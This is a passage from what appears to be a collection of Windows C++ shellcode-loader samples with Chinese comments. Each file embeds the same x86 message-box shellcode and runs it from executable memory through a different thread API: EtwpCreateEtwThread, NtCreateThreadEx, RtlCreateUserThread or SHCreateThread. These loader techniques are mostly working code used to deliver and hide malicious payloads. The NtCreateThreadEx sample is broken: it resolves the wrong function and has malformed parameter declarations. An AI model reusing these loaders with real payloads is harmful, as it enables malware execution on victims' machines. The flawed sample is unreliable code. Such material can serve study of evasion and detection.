0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef HANDLE (WINAPI * EtwpCreateEtwThread_t)(LPVOID exec, LPVOID param);
EtwpCreateEtwThread_t EtwpCreateEtwThread;
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
//pEtwpCreateEtwThread EtwpCreateEtwThread;
//得到ntdll的地址
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
EtwpCreateEtwThread = (EtwpCreateEtwThread_t)GetProcAddress(hNtdllModule, "EtwpCreateEtwThread");
if (bRet != 0)
{
// execution
HANDLE h_thread = EtwpCreateEtwThread(exec, NULL);
WaitForSingleObject(h_thread, -1);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
NtCreateThreadEx.cpp
// NtCreateThreadEx.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef NTSTATUS (NTAPI * NtCreateThreadEx_t)(
PHANDLEThreadHandle,//用于存储新线程的句柄
ACCESS_MASKDesiredAccess,//新线程的访问权限
LPVOIDObjectAttributes,//与线程相关的对象属性
HANDLEProcessHandle,//要在其中创建线程的进程的句柄
LPTHREAD_START_ROUTINEStartRoutine,//线程的起始地址,即线程将从此地址开始执行。
PVOIDArgument,//传递给线程起始地址的参数
ULONGCreateFlags,// 用于指定线程创建的标志
ULONGZeroBits,// 线程栈中零位的数量
SIZE_TStackSize,//线程栈的大小
SIZE_TMaximumStackSize,//线程栈的最大大小
PVOIDAttributeList//指向线程属性列表的指针
);
NtCreateThreadEx_t pNtCreateThreadEx;
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
//拿到NtCreateThreadEx函数地址
pNtCreateThreadEx = (NtCreateThreadEx_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlCreateUserThread");
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
HANDLE hThread = 0;
if (bRet != 0)
{
pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)exec, NULL, NULL, NULL, NULL, NULL, NULL );
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
RtlCreateUserThread-内核函数.cpp
// RtlCreateUserThread-内核函数.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS (NTAPI * RtlCreateUserThread_t)(
HANDLE ProcessHandle,//在其中创建线程的进程的句柄。
PSECURITY_DESCRIPTOR SecurityDescriptor,//用于控制线程访问权限的安全描述符
BOOLEAN CreateSuspended,//如果为 TRUE,则创建的线程将以挂起状态启动。
ULONG StackZeroBits,//用于控制线程栈的分配
PULONG StackReserved,// 用于控制线程栈的分配。
PULONG StackCommit,// 用于控制线程栈的分配。
LPTHREAD_START_ROUTINE StartAddress,//线程的起始地址,即线程将从此地址开始执行。
PVOID StartParameter,//传递给线程起始地址的参数
PHANDLE ThreadHandle,//用于存储新线程的句柄。
PCLIENT_ID ClientID//用于存储新线程的客户端标识。
);
RtlCreateUserThread_t pRtlCreateUserThread;
int main()
{
//得到内核函数地址
pRtlCreateUserThread = (RtlCreateUserThread_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlCreateUserThread");
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD oldProtect = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect);
HANDLE hThread = NULL;
if (bRet != 0)
{
pRtlCreateUserThread(GetCurrentProcess(), NULL, FALSE, NULL, NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL,&hThread, NULL);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox),MEM_RELEASE);
}
SHCreateThread.cpp
// SHCreateThread.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
#include <stdint.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi")
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
PVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_protect = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
if (bRet != 0)
{
SHCreateThread(NULL, NULL, CTF_COINIT | CTF_PROCESS_REF, (LPTHREAD_START_ROUTINE)exec);
}
// deallocate the space
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
SHCreateThreadWithHandle.cpp
// SHCreateThreadWithHandle.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
#include <stdint.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi")
unsigned char x86_nullfree_msgbox[] = {
